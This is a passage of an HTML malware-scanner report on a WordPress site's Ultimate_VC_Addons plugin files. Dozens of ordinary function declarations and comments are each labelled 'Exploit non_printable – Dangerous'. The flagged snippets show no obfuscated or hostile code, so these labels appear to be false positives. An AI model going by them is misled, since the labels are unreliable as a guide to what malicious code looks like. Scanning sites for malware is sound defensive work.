<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_459").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_swatch_book.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 35.12 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 22</span><br><table id="file_460" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">content</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) { global </span><span style="color: #0000BB">$uavc_ultimate_swatch_book</span><span style="color: #007700">; return </span><span style="color: #0000BB">$uavc_ultimate_swatch_book</span><span style="color: #007700">-></span><span style="color: #0000BB">swatch_item</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">); } } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Swatch Book Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 144</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">', '</span><span style="color: #0000BB">ultimate_vc</span><span style="color: #DD0000">' ),</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Swatch Book module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 42</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_is_inline' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 58</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that register styles </span><span style="color: #007700">and </span><span style="color: #0000BB">scripts </span><span style="color: #007700">for </span><span style="color: #0000BB">Swatch Book Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 618</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Swatch Book Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 624</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">swatch_container</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_swatch_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 68</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Swatch Book Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 707</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 72</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">swatch_book_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 73</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">index</span><span style="color: #007700">, </span><span style="color: #0000BB">element</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 788</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">swatch_item</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 846</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 856</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">content</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 858</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uavc_ultimate_swatch_book</span><span style="color: #007700">-></span><span style="color: #0000BB">swatch_ocntainer</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 876</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uavc_ultimate_swatch_book</span><span style="color: #007700">-></span><span style="color: #0000BB">swatch_item</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_460").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_flip_box.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 49.58 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_461" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">flip_box_scripts</span><span style="color: #007700">() { </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_script</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate-vc-addons-flip_box_js'</span><span style="color: #007700">, </span><span style="color: #DD0000">'flip-box'</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, array( </span><span style="color: #DD0000">'jquery' </span><span style="color: #007700">), </span><span style="color: #0000BB">ULTIMATE_VERSION</span><span style="color: #007700">, </span><span style="color: #0000BB">true </span><span style="color: #007700">); </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_style</span><span style="color: #007700">( </span><span style="color: #DD0000">'ultimate-vc-addons-f</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1169</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that register styles </span><span style="color: #007700">and </span><span style="color: #0000BB">scripts </span><span style="color: #007700">for </span><span style="color: #0000BB">Flip Box Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">flip_box_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that checks </span><span style="color: #007700">if </span><span style="color: #0000BB">the </span><span style="color: #007700">class </span><span style="color: #0000BB">is exists </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Flip Box Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Flip Box module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes settings of Flip Box Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">block_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 34</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 843</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Flip Box Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 848</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">block_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_461").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_icon_timeline.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 76.55 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:24</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 15</span><br><table id="file_462" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">; } } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCodesContainer' </span><span style="color: #007700">) && ! </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode_Icon_Timeline' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_Icon_Timeline </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCodesContainer </span><span style="color: #007700">{ } } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCodesContainer' </span><span style="color: #007700">) && !</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 11</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate Timeline Module</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1203</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_timeline</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1266</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_timeline_sep</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1342</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_timeline_feat</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1536</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$feat_spl</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1546</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">icon_timeline_item</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1710</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$html</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the Ultimate Timeline module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">to regester assets</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 37</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">register_timeline_assets</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_icon_timeline</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 47</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
